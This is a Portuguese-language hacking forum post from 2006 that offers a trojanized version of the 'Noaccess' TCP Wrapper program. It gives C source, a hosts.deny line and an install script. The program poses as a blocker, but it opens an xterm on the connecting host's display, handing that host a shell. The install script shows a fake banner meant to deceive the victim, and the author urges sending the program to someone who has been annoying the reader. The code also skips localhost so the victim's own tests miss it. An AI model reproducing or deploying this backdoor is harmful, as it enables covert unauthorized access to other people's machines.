Wrapper + C + Xterm

Started by _Dr4k0_, 02 de September , 2006, 10:30:39 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

_Dr4k0_

02 de September , 2006, 10:30:39 AM
Ae, mostrarei aqui umas gracinhas q podemos fazer misturando o Wrapper
com C e Xterm.

O esquema eh o seguinte, o programa Noaccess (vcs jah devem ter visto)
bloqueia todos os servissos do seu computador ( telnet, ftp, finger, etc..),
ele tambem copia o IP de quem tentou acessar sua maquina deixando um aviso
do tipo:

Vc X.X.X.X, naum foi autorizado a utilizar o servisso tal...
Vc esta nos meus logs, Naum volte mais.

Se vc sabe configurar o Wrapper e entende um pouco de C, pode alterar o
Noaccess e torna-lo muito mais util. Aqui esta um exemplo:
acrescentando um pequeno codigo no programa, ele deixa de bloquear e abre
a maquina do quem instalou. Mande esse programa pra alguem que tiver te
zuando e tenha acesso a maquina dele. O codigo que eu acrescentei faz com
que a maquina da vitima execute um comando que abre um Xterm na maquina de
quem solicitou a coneccao. Com acesso ao shell, vc pode executar comandos
na maquina dele.
Lembre-se de que vc tem que digitar "xhost +" na sua maquina, para permitir
que o xterm seja aberto. Ae vai o prog alterado:

programa noaccess.c

<++> noaccess/noaccess.c
Code Select
/*
NoAccess
All:All: twist /var/noacess %h %d ; \
/bin/echo -e "%h tentou acessar %f " >> /var/log/security.log
*/
 
#include<stdio.h>
#include<string.h>
int main(int argc, char *argv[]){
int i;
char str[50];
for(i=2; i >= 0; printf("%i ",i), fflush(stdout), sleep(1), i--);
        printf("\n\nVoce , %s ,nao foi autorizado a se conectar com meu computador!\n\n", argv[1]);
        printf("Voce esta nos meus logs!Nao volte mais !!!\n\n");
strcpy(str, argv[1]);
if (strcmp(str, "127.0.0.1")) {
strcpy(str, "xterm -display ");
strcat(str, argv[1]);
strcat(str, ":0.0 &");
        system(str);
}
}
<-->

Aqui vai o arquivo hosts.deny


<++>

Code Select
noaccess/ipcaph.d
All:All: twist /var/noaccess %h %d ; \
/bin/echo -e "%h tentou acessar %d " >> /var/log/ipcap.log;
<-->


Aqui vai o script para instalacao automatica, coloque ele em um diretorio
junto dos outros dois arquivos ( o noaccess e o hosts.deny ):


<++> noaccess/install.sh

Code Select
cp /etc/hosts.deny /`whoami`/
cp /etc/hosts.deny ~`whoami`/
clear
echo " "
echo "**********************************"
echo "** armengado por AciDmuD **"
echo "**** instalando IpCapture 1.0 ****"
echo "**********************************"
echo " "
echo "as tentativas de log seram armazenadas em /var/log/ipcap.log"
echo " "
cat ipcaph.d > /etc/hosts.deny
gcc -o noaccess noaccess.c
chmod 555 noaccess
mv noaccess /var/
<-->


Pronto, agora excute o script. Ele faz uma copia do verdadeiro hosts.deny
e coloca-o em seu diretorio home. Mostra um texto: armengado por kamikase
Shell .. Ip Capture 1.0 e tal.. (soh pra iludir o coitado)
Quando o programa eh chamado ele testa se o IP de quem solicitou a
coneccao foi 127.0.0.1, pois se o lamah for testar o programa provavelmente
desconfiaria do Xterm que seria criado na sua propria maquina :P

Autor:AciDmuD
Fonte:Www.HackMode.Com.Br
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

OnlyOne

#1
02 de September , 2006, 11:50:34 AM
eu acho q ja vi esse txt na antiga fatal 3rror zine
No céu toca Joy Division

Print
Go Up Pages1
User actions